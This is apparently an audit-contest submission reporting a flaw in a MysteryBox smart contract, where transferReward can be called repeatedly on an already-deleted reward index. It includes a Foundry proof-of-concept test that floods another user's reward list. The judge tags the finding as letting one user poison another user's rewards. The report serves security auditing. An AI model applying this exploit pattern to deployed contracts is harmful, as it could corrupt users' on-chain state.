Submission Details
Severity:
Transferring the same reward multiple times which increases gas consumption.
Summary
A user can transfer the same reward multiple times though the reward would be deleted in the first call he can make repeated transactions with the same index which shouldn't go through as the reward has already been transferred.
Vulnerability Details
IMPACT
Calling the same function without any actual reward to transfer would result in high consumption of gas without any defenitive purpose.
POC
function testTransferReward_InvalidIndex() public {
//funding user1
vm.deal(user1, 1 ether);
//buying five mystery boxes
for (uint i=0;i<5;i++)
{
vm.startPrank(user1);
mysteryBox.buyBox{value: 0.1 ether}();
mysteryBox.openBox();
vm.stopPrank();
}
//Transferring the same reward multiple times
for(uint i=0;i<10;i++)
{
vm.startPrank(user1);
mysteryBox.transferReward(user2, 0);
vm.stopPrank();
}
vm.prank(user2);
MysteryBox.Reward[] memory rewards = mysteryBox.getRewards();
assertEq(rewards.length, 10);
}
Tools Used
=> manual review
=> foundry
Recommendations
once the user transfers reward from an index re-arranging the array index should help with this issue.
Updates
Appeal created
inallhonesty 11 months ago
Submission Judgement Published Assigned finding tags:
A user can poison the `rewardsOwned` of another user via `transferReward` of an empty reward index
Rewards breakdown
nSLOC
86This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.